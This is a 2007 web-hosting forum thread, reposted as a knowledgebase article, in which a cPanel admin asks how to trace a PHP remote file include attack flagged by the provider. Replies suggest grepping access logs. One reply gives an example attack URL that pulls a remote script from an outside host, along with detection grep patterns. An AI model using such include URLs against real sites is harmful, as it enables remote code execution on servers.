Knowledgebase

Portal Home > Knowledgebase > Articles Database > PHP exploit


PHP exploit




Posted by The Critic, 11-24-2007, 11:51 PM
My provider sent me an abuse ticket with the message below. This is a cPanel server with 300 domains. How do I go about tracking down the problem? They can’t give me anymore information and I don’t know where else to look. This ticket was automatically generated by the XXXXXXXXXXXXXX Network Protection System. An unusual amount of traffic has been detected involving your IP address xx.xx.xx.xx. Details of the event follow: 3885: HTTP: PHP File Include Exploit This filter detects an attempt to post the contents of an external script to a PHP application. This behavior is typical of a PHP file include vulnerability attack. This attack could allow an attacker to insert custom code into a variable that would be executed by all users of the vulnerable application. Thanks.
Posted by Dave W, 11-24-2007, 11:53 PM
They didn't give you any more information? An example of the actual execution would have been nice.
Posted by The Critic, 11-24-2007, 11:56 PM
No, that is what they provided. They also provide links to examples of PHP file include attacks, but not from my server. I can't post them as I'm a new user here.
Posted by Dave W, 11-24-2007, 11:59 PM
If they provided an example like index.php?http://somewebsite.ru/hack.txt you could do a grep "hack.txt" /etc/httpd/domlogs/* but without more information you almost have to check every site on the server.. A good place to start would be the /tmp directory
Posted by The Critic, 11-25-2007, 12:01 AM
tmp is clear.
Posted by The Critic, 11-25-2007, 12:07 AM
These are the links they provided as examples: http://www.derkeiler.com/Mailing-Lis...5-05/0237.html http://www.securityfocus.com/bid/14028 http://www.osvdb.org/displayvuln.php?osvdb_id=3592
Posted by Dave W, 11-25-2007, 12:10 AM
start with grep "include/common.php" /etc/htppd/domlogs/* then grep "php?root_dir=" /etc/httpd/domlogs/* The other one is Cacti, Are you running a copy of Cacti?


Was this answer helpful?

Add to Favourites Add to Favourites    Print this Article Print this Article

Also Read
Help Me Error In Setup FFMPEG (Views: 515)
Under attack | URGENT (Views: 536)
A program that prepopulates MySQL and is able to show individual records online ? (Views: 522)
reseller questions [newbie] (Views: 527)
VMware Server2 Virtual Infrastructure Web Access Issues (Views: 484)

Language: